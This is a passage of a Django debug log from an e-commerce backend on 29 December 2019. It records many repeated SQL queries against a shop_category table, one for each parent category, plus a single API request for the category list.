19:47:51,217 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-29 19:47:51,219 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-29 19:47:51,222 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-29 19:47:51,225 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-29 19:47:51,228 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-29 19:47:51,231 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-29 19:47:51,236 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-29 19:47:51,239 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-29 19:47:51,242 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-29 19:47:51,245 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-29 19:47:51,248 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-29 19:47:51,252 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-29 19:47:51,255 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-29 19:47:51,258 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-29 19:47:51,261 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-29 19:47:51,264 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-29 19:47:51,269 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-29 19:47:51,272 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-29 19:47:51,275 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-29 19:47:51,278 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-29 19:47:51,281 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-29 19:47:51,283 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-29 19:47:51,287 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-29 19:47:51,290 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-29 19:47:51,293 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-29 19:47:51,297 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-29 19:47:51,300 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [29/Dec/2019 19:47:51] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-29 19:47:55,937 utils 2749 140297222735616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-29 19:47:55,947 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-29 19:47:55,952 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-29 19:47:55,954 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-29 19:47:55,957 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-29 19:47:55,960 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-29 19:47:55,962 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-29 19:47:55,964 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-29 19:47:55,967 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-29 19:47:55,970 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-29 19:47:55,972 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-29 19:47:55,975 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-29 19:47:55,977 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-29 19:47:55,979 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-29 19:47:55,983 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-29 19:47:55,986 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-29 19:47:55,989 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-29 19:47:55,991 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-29 19:47:55,993 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-29 19:47:55,997 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-29 19:47:56,000 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-29 19:47:56,002 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-29 19:47:56,005 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-29 19:47:56,007 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-29 19:47:56,010 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-29 19:47:56,013 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-29 19:47:56,016 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-29 19:47:56,018 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-29 19:47:56,020 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-29 19:47:56,022 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-29 19:47:56,026 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-29 19:47:56,028 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-29 19:47:56,030 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-29 19:47:56,032 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-29 19:47:56,034 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-29 19:47:56,039 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-29 19:47:56,042 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-29 19:47:56,044 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-29 19:47:56,047 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-29 19:47:56,052 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-29 19:47:56,055 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 